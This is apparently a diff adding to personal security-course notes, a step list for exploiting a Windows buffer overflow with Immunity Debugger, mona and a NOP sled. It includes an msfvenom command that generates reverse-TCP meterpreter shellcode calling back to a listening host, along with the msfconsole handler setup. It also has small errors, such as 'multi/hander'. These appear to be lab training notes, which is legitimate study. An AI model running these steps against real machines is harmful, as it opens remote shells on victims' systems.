jdbonner/Security/Commands.md

 - set the eip as the converted bytes
 - ensure nop sled is set to ```"\x90" * 15```. the number can be between 10 and 20
 - place code from msfconsole below for shell
+### Steps for windows
+- launch Immunity Debugger with admin
+- check strings of vuln program
+- run vuln program
+- run ```netstat -anop tcp``` in powershell
+- run ```get-process``` in powershell to view more information
+- begin analysis with immunity debugger
+- determine successfull interaction with the program and port
+- successfully break the program
+- utilize wiremask online tool to find offset
+- verify offset
+- search for first address ```!mona jmp -r ESP -m "essfunc.dll" ```.
+Check in the log window
+- convert indian of bytes and ensure caps did not change
+- create shellcode ```msfvenom -p windows/meterpreter/reverse_tcp lhost=10.50.30.229 lport=5555 -b "\x00" -f python```.
+- utilize msfconsole
+- multi/handler ```use multi/hander```
+- set the payload to the same as your reverse payload. ```set payload windows/meterpreter/reverse_tcp```
+- set the lport to what you set in the msfvenom reverse payload. ```set lport 5555```
+- set the lhost to the box that you want to reverse to. ```set lhost 0.0.0.0```
+- run exploit to start the listener
+- run the script to exploit the machine
+-

 ### Example of script